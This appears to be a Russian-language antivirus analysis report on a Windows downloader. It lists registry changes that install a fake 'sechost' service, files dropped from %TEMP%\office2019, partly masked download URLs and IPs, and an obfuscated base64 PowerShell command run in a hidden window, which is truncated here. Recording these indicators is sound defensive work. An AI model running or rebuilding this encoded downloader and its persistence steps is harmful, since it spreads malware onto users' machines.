Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\sechost] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\sechost] 'ImagePath' = '"%WINDIR%\SysWOW64\secproc_ssp_isv\sechost.exe"'
- 'sechost' "%WINDIR%\SysWOW64\secproc_ssp_isv\sechost.exe"
- 'sechost' %WINDIR%\SysWOW64\secproc_ssp_isv\sechost.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAHgAMgA4AHcAagA2AD0AKAAnAFoAJwArACcAaAA2AG8AJwArACcAYQB4AHMAJwApADsAJgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgB0AGUATQBQAFwATwBmAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\sf7_ydku.exe
- %WINDIR%\syswow64\secproc_ssp_isv\sechost.exe
- %TEMP%\office2019\sf7_ydku.exe в %WINDIR%\syswow64\secproc_ssp_isv\sechost.exe
- '70.##1.172.89':80
- http://ac#.#erabd.com/gt7pie/WMq/
- http://70.##1.172.89/H4yH7Wk7PFXwJY/vJRQH/2eYNej3235jmd/JpXan8PYJs2Z0gyZRs/HIl9sPdjJYoifdbbUSc/
- DNS ASK ac#.#erabd.com
- '%TEMP%\office2019\sf7_ydku.exe'
- '%WINDIR%\syswow64\secproc_ssp_isv\sechost.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAHgAMgA4AHcAagA2AD0AKAAnAFoAJwArACcAaAA2AG8AJwArACcAYQB4AHMAJwApADsAJgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgB0AGUATQBQAFwATwBmAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)